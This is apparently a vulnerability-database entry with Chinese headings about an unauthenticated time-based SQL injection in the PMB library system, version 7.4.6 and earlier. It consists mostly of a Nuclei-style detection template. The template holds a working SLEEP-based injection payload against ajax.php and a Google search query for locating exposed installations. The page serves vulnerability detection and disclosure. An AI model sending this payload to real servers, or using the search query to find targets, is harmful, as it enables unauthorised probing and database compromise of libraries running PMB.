漏洞描述
PMB is a completely free ILS (Integrated Library management System). The domain of software for libraries is almost exclusively occupied by proprietary products. We are some librarians, users and developers deploring this state of affairs.
pmb-sqli: PMB <= 7.4.6 - SQL Injection
PoC代码[已公开]
id: pmb-sqli
info:
name: PMB <= 7.4.6 - SQL Injection
author: r3Y3r53
severity: high
description: |
PMB is a completely free ILS (Integrated Library management System). The domain of software for libraries is almost exclusively occupied by proprietary products. We are some librarians, users and developers deploring this state of affairs.
reference:
- https://www.exploit-db.com/exploits/51197
- https://vulners.com/exploitdb/EDB-ID:51197
metadata:
verified: true
max-request: 1
google-query: inurl:"opac_css"
tags: time-based-sqli,sqli,unauth,pmb,vuln
http:
- raw:
- |
@timeout: 15s
GET /pmb/opac_css/ajax.php?categ=storage&datetime=undefined&id=1%20AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(7)))SHde)&module=ajax&sub=save&token=undefined HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'contains(content_type, "text/html")'
- 'contains(header, "PmbOpac")'
- 'duration>=7'
- 'status_code == 200'
condition: and
# digest: 4b0a00483046022100841a904da753cdc0faf99fd2f8dd73995887b3f130e03c5510ef08637e6dc7e8022100b1172df530ad52391c0c3492b7914948b255f90d1d2121338ad5026943f0f95a:922c64590222798bb761d5b6d8e72950